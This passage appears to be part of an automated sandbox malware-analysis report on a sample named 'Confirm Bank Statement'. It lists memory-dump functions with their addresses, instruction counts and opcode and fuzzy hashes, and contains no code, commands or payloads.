                                                                                              Function 028768A1 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c63ce36f91999d901bd0db3b50205e709ab8e0b945169b2ad36729a9b4b096ac
                                                                                              • Instruction ID: fe49099b03a4675f9d47cd1e0110fa6ca6f24901297f2b6d3b3da5d309bca5dd
                                                                                              • Opcode Fuzzy Hash: c63ce36f91999d901bd0db3b50205e709ab8e0b945169b2ad36729a9b4b096ac
                                                                                              • Instruction Fuzzy Hash: 0DE02B79C0C3590FDF12F7B4ACD14883F32A991110700476AD4060D49FD9BD290FC742
                                                                                              Function 0287947D Relevance: .0, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f3668c8d2b96f49ba0231a9aebd33996886923372a17a983031aab4eb516020
                                                                                              • Instruction ID: fd14467e36a4c181ee3e775f59698f4d7d82cdd3a7b097b0f74eb593ce4bb549
                                                                                              • Opcode Fuzzy Hash: 1f3668c8d2b96f49ba0231a9aebd33996886923372a17a983031aab4eb516020
                                                                                              • Instruction Fuzzy Hash: 8FD0673AB000189FCB049F98EC509DDF776FB98221B448116E915A3260C631A965DB64
                                                                                              Function 028768B0 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4630bdfec8e7901400dedf469e7a29cfe2483a703038366bd8d451baf8091f8e
                                                                                              • Instruction ID: 3a7980eaf10a88e16b0da201c4d92af29302675259cd4195f8d737cd15158f29
                                                                                              • Opcode Fuzzy Hash: 4630bdfec8e7901400dedf469e7a29cfe2483a703038366bd8d451baf8091f8e
                                                                                              • Instruction Fuzzy Hash: 93C0803451431D4FDA01F775FD55515372F76C01117408A11E0090D55DDE747D4B9792

                                                                                              Non-executed Functions

                                                                                              Function 0287FA88 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd1b1f3c1cf4ace8244d85f8beb278c4e4be4a93c6b268c18d3067813734cc1a
                                                                                              • Instruction ID: 83b63eb784d9f39cdcd39e9415f2835d97b7d0f5a7b2bf1167c791cc7a2650ae
                                                                                              • Opcode Fuzzy Hash: cd1b1f3c1cf4ace8244d85f8beb278c4e4be4a93c6b268c18d3067813734cc1a
                                                                                              • Instruction Fuzzy Hash: 65C1A478E01218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 0287D690 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cbff00c09f87663a65038587426638dbabdff1ba84b74b7ef7ef474991196aa0
                                                                                              • Instruction ID: f69f7fe03485741c51385cd48106f8097b635625f0cff0a7f5bc41319f904408
                                                                                              • Opcode Fuzzy Hash: cbff00c09f87663a65038587426638dbabdff1ba84b74b7ef7ef474991196aa0
                                                                                              • Instruction Fuzzy Hash: 7AC1B478E00218CFDB14DFA9C944B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287A6C8 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5bfe35522c66ec8768be574ca25fd2069231b19cf62764ae258e2706f887cd88
                                                                                              • Instruction ID: 3bef580ac3141a0680924e52bbbc3e88ed0adafd154883f953efbf5a0fb1d3ed
                                                                                              • Opcode Fuzzy Hash: 5bfe35522c66ec8768be574ca25fd2069231b19cf62764ae258e2706f887cd88
                                                                                              • Instruction Fuzzy Hash: 0FC1C378E00218CFDB14DFA9C955B9DBBB2BF89300F1080A9D809AB355DB359E85CF50
                                                                                              Function 02872AF0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6911f1d638744264e19583e2fa4d4eaa7d87a259c48ca8ef513625d4a50c2fc
                                                                                              • Instruction ID: 13df90233a2b063479eaeb404fdc4a75ff242b818396fd757da3793f69200073
                                                                                              • Opcode Fuzzy Hash: e6911f1d638744264e19583e2fa4d4eaa7d87a259c48ca8ef513625d4a50c2fc
                                                                                              • Instruction Fuzzy Hash: 89C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 02879E18 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b09c20e3797a2502f9b5b443f2d09f0e4f95357a9c13239a637befc8457fe24
                                                                                              • Instruction ID: 68bff4cddd0218969923840e9063b351869093653e0a97f354ed7a0e25a7b0c8
                                                                                              • Opcode Fuzzy Hash: 6b09c20e3797a2502f9b5b443f2d09f0e4f95357a9c13239a637befc8457fe24
                                                                                              • Instruction Fuzzy Hash: 1EC1A378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287F630 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 22b0afb01b8a0ebaedef9b9afc8d500be6e34fbf3b5a307cdafda488685466fe
                                                                                              • Instruction ID: 9d4cfbf63decc7133c5c5ff12e874686912d2b82e059fdb0de04927f91bde4e4
                                                                                              • Opcode Fuzzy Hash: 22b0afb01b8a0ebaedef9b9afc8d500be6e34fbf3b5a307cdafda488685466fe
                                                                                              • Instruction Fuzzy Hash: 37C1B378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287D238 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 95274f8c1809495dc03b9d36e21723a589663866d23164938103c903c09cd022
                                                                                              • Instruction ID: bf051eefcebfd39f676ba48c3a50a17daed1328bd50cb74040b35ee3a2f667ac
                                                                                              • Opcode Fuzzy Hash: 95274f8c1809495dc03b9d36e21723a589663866d23164938103c903c09cd022
                                                                                              • Instruction Fuzzy Hash: 8EC1A478E01218CFDB14DFA9C995B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 0287A270 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 275f3e14c5428d544b6ffd8118ac308ee57c36da7cfb39c1d2f9aec93f13f4d5
                                                                                              • Instruction ID: 025dd50a818420cb04ebb1dffc030bb17c1f7c43316054cdf357332cfc4a5d36
                                                                                              • Opcode Fuzzy Hash: 275f3e14c5428d544b6ffd8118ac308ee57c36da7cfb39c1d2f9aec93f13f4d5
                                                                                              • Instruction Fuzzy Hash: D7C1B378E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 028733A0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6144baf5fa6e50ba8670d7d4682a78e34d6a4c9f1fcdca353e0ac3eca4d48924
                                                                                              • Instruction ID: 4ff426639183b01db7a42071bab84ed4d03ad295980f342dbc162ee2007d8f66
                                                                                              • Opcode Fuzzy Hash: 6144baf5fa6e50ba8670d7d4682a78e34d6a4c9f1fcdca353e0ac3eca4d48924
                                                                                              • Instruction Fuzzy Hash: 9BC1C378E01218DFDB14DFA9C945B9DBBB2BF88300F2081A9D809AB355DB359E85CF51
                                                                                              Function 0287B3D0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd908ab9d5b4cd4296bad7c81a767feaa60e2f19552ab2127e2555193d4f3975
                                                                                              • Instruction ID: 7559c3b413b5ca64d5e25eb85220b71a29433892ac01c0d20dd6bdd557e512b9
                                                                                              • Opcode Fuzzy Hash: dd908ab9d5b4cd4296bad7c81a767feaa60e2f19552ab2127e2555193d4f3975
                                                                                              • Instruction Fuzzy Hash: 5BC1B378E01218CFDB14DFA9C955B9DBBB2BF89304F2080A9D809AB355DB359E85CF50
                                                                                              Function 028737F8 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56e357744cdf905666b9347db28698640a17a31f52cd0ef0fca34f1d48aa1f87
                                                                                              • Instruction ID: a9b4f4f8eb160034be092f0995395e42376b0b1f7a6384b524fbfd0572dd51f8
                                                                                              • Opcode Fuzzy Hash: 56e357744cdf905666b9347db28698640a17a31f52cd0ef0fca34f1d48aa1f87
                                                                                              • Instruction Fuzzy Hash: 48C1C378E00218CFDB14DFA9C945B9DBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                                                              Function 0287AB20 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f42c784e4a28791bd9206576b3a81223190bfa4ac15f5d56a86067dda17ee61e
                                                                                              • Instruction ID: f0810c0284a7ee9e95f3010388af976ec71b95d83aca158408ce8322644d6581
                                                                                              • Opcode Fuzzy Hash: f42c784e4a28791bd9206576b3a81223190bfa4ac15f5d56a86067dda17ee61e
                                                                                              • Instruction Fuzzy Hash: 2CC1C378E01218CFDB14DFA9C955B9DBBB2BF89301F1080A9D809AB395DB359E85CF50
                                                                                              Function 02872F48 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2dc850cc3bc96f056be26b3d334b42d8b96ff601a80f7bdae78ca132c2ff2e85
                                                                                              • Instruction ID: 38b476f5712e601b26a73ec4c16f89bf0adb77906f575cd8d4d011584ef0ba0b
                                                                                              • Opcode Fuzzy Hash: 2dc850cc3bc96f056be26b3d334b42d8b96ff601a80f7bdae78ca132c2ff2e85
                                                                                              • Instruction Fuzzy Hash: 89C1C478E01218CFDB14DFA9C944B9DBBB2BF89300F2081A9D809AB355DB359E85CF51
                                                                                              Function 0287BC80 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9be4323dc15ce10f7ebd4d059766c418ddf0e62b28e63d5ed2f71a67d3986026
                                                                                              • Instruction ID: 0a301553601ae198ff5717115a144742825d2bc658ff1d9050e2a0eb51daa436
                                                                                              • Opcode Fuzzy Hash: 9be4323dc15ce10f7ebd4d059766c418ddf0e62b28e63d5ed2f71a67d3986026
                                                                                              • Instruction Fuzzy Hash: EEC1B478E00218CFDB14DFA9C955B9DBBB2BF89304F1081A9D809AB355DB359E85CF50
                                                                                              Function 02870498 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f75097eb4ae218b4e5a75fd62bc59561f17e5c0d4fa4dad34c3d443b3e52561f
                                                                                              • Instruction ID: 7109957df76b4985f564840fcc8b412270a80a223bb80139f2b8566500e08cc7
                                                                                              • Opcode Fuzzy Hash: f75097eb4ae218b4e5a75fd62bc59561f17e5c0d4fa4dad34c3d443b3e52561f
                                                                                              • Instruction Fuzzy Hash: FBC1A278E01218CFDB14DFA9C954B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 028740A8 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 91846db3cee2df181f3fedc46e0617169be1e0566f793ca632157caea607d9b9
                                                                                              • Instruction ID: 6140592988f55175f897a039db52179590c513ef9802fbcd4cfc1b6cf1562ef9
                                                                                              • Opcode Fuzzy Hash: 91846db3cee2df181f3fedc46e0617169be1e0566f793ca632157caea607d9b9
                                                                                              • Instruction Fuzzy Hash: ECC1B378E01218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB395DB359E85CF50
                                                                                              Function 0287E4D0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f63b914c5347af5421ac90cba95d3ab69c50391c7e4ab91a4a8be6831706143
                                                                                              • Instruction ID: 25dbcaa15115389c90d81fe27136024906baffff7439763af9fb287f5b5df0b8
                                                                                              • Opcode Fuzzy Hash: 9f63b914c5347af5421ac90cba95d3ab69c50391c7e4ab91a4a8be6831706143
                                                                                              • Instruction Fuzzy Hash: FEC1C478E01218CFDB14DFA9C985B9DBBB2BF89300F1080A9D809AB355DB359E85CF50
                                                                                              Function 0287C0D8 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 716e52c194bd12a7e152c1886b1aadc14aa9bbf28fabed0d1f234292b9668f44
                                                                                              • Instruction ID: 85d8b201d9b80c664c5d833f81885547374085fe96b64e98db04bee197b4e643
                                                                                              • Opcode Fuzzy Hash: 716e52c194bd12a7e152c1886b1aadc14aa9bbf28fabed0d1f234292b9668f44
                                                                                              • Instruction Fuzzy Hash: 54C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F1081AAD809AB355DB359E85CF50
                                                                                              Function 028708F0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f692c50912247cd75d92dd9719dc401afe1d5bad414f1cbb0c1ce62a7cbc6c12
                                                                                              • Instruction ID: 0e982c6bf47f77f65a26107f961e23574204915fec5e1fd71ac5fcbb4d6658ef
                                                                                              • Opcode Fuzzy Hash: f692c50912247cd75d92dd9719dc401afe1d5bad414f1cbb0c1ce62a7cbc6c12
                                                                                              • Instruction Fuzzy Hash: BAC1C378E01218CFDB14DFA9C954B9DBBB2BF88301F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287DC20 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 893c19a1ba8e260b929b4227b3a720f486d55e7db75faa2f172def5d4e6ca675
                                                                                              • Instruction ID: 74f5dec0d0b511aa93504dcc5d3b77d96410b77a6ade2716fc6e019dec61d470
                                                                                              • Opcode Fuzzy Hash: 893c19a1ba8e260b929b4227b3a720f486d55e7db75faa2f172def5d4e6ca675
                                                                                              • Instruction Fuzzy Hash: 14C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB395DB359E85CF50
                                                                                              Function 0287B828 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 46d357100ab77ae8d73d49c95580c2614e3c20e56499f85f234b6e8d96a217ec
                                                                                              • Instruction ID: 21ba370d702ce7e0419ada83ab1d0ccb67459bd307f7fa9ef1be84bbc1b16ca8
                                                                                              • Opcode Fuzzy Hash: 46d357100ab77ae8d73d49c95580c2614e3c20e56499f85f234b6e8d96a217ec
                                                                                              • Instruction Fuzzy Hash: C9C1C578E01218CFDB14DFA9C955B9DBBB2BF89304F1080A9D809AB355DB359E85CF50
                                                                                              Function 02870040 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 436f1c16dd56926b50fb7b46c1efc18622052d19d6395b6ff0042487d3b8495d
                                                                                              • Instruction ID: 71247e60e1de6c2ed1c7e4e14557d48911b0b57230f8fed85e7c60d8b9e2f9f5
                                                                                              • Opcode Fuzzy Hash: 436f1c16dd56926b50fb7b46c1efc18622052d19d6395b6ff0042487d3b8495d
                                                                                              • Instruction Fuzzy Hash: 47C1C478E00218CFDB14DFA9C945B9DBBB2BF89300F1080A9D809AB355DB359E85CF50
                                                                                              Function 02873C50 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aad5dea8604772ce841aa04a0255dc9b0d0b9dc34a8b3584af0f855cd7d369d6
                                                                                              • Instruction ID: ffd04475ebae6503bb7e0334d5774633588efe3920c3f427199eafa688da6538
                                                                                              • Opcode Fuzzy Hash: aad5dea8604772ce841aa04a0255dc9b0d0b9dc34a8b3584af0f855cd7d369d6
                                                                                              • Instruction Fuzzy Hash: DEC1D478E01218CFDB14DFA9C945B9DBBB2BF89300F1080A9D809AB395DB359E85CF50
                                                                                              Function 0287E078 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85865e7a28a8f6c89c881fd2da8830e0d6bfa660449ad62016c7ad357c5deea2
                                                                                              • Instruction ID: 33fb487d8ffdf8678c798d790ff83fd42e9a802a2b1bbfe6e70653cfa9e29475
                                                                                              • Opcode Fuzzy Hash: 85865e7a28a8f6c89c881fd2da8830e0d6bfa660449ad62016c7ad357c5deea2
                                                                                              • Instruction Fuzzy Hash: ECC1C478E00218CFDB14DFA9C955B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 0287ED80 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d6866a8a4a0d96fb3e35b68c9351039471235740709fc8d52f23a297e2781ef
                                                                                              • Instruction ID: 776339a7410ee689e285ccb29e139e534a44a79f7b750005724110bb0530bfd3
                                                                                              • Opcode Fuzzy Hash: 7d6866a8a4a0d96fb3e35b68c9351039471235740709fc8d52f23a297e2781ef
                                                                                              • Instruction Fuzzy Hash: 0FC1B478E01218CFDB14DFA9C955B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                              Function 0287C988 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1847c48f5cef35a6898c915230355980775eb467b83560639749276da12fb7f
                                                                                              • Instruction ID: 3ccdacb78350de728da9847a547b407bd2bad28427f75979f2e8fe10d2b172e4
                                                                                              • Opcode Fuzzy Hash: a1847c48f5cef35a6898c915230355980775eb467b83560639749276da12fb7f
                                                                                              • Instruction Fuzzy Hash: A7C1B478E01218CFDB14DFA9C955B9DBBB2BF89300F1081AAD809AB355DB359E85CF50
                                                                                              Function 028711A0 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6fbef5f61d11f4fc46a9d423a0913c6fc1ee3d1f9e688714b72ed076e8e108c
                                                                                              • Instruction ID: df34f587ecc322c9e8d734cb8dcc2816b61cef94688deee9017afc54f9f46f34
                                                                                              • Opcode Fuzzy Hash: b6fbef5f61d11f4fc46a9d423a0913c6fc1ee3d1f9e688714b72ed076e8e108c
                                                                                              • Instruction Fuzzy Hash: 8EC1B378E00218DFDB14DFA9C994B9DBBB2BF89300F1081A9D809AB355DB359E85CF50
                                                                                              Function 0287F1D8 Relevance: .3, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
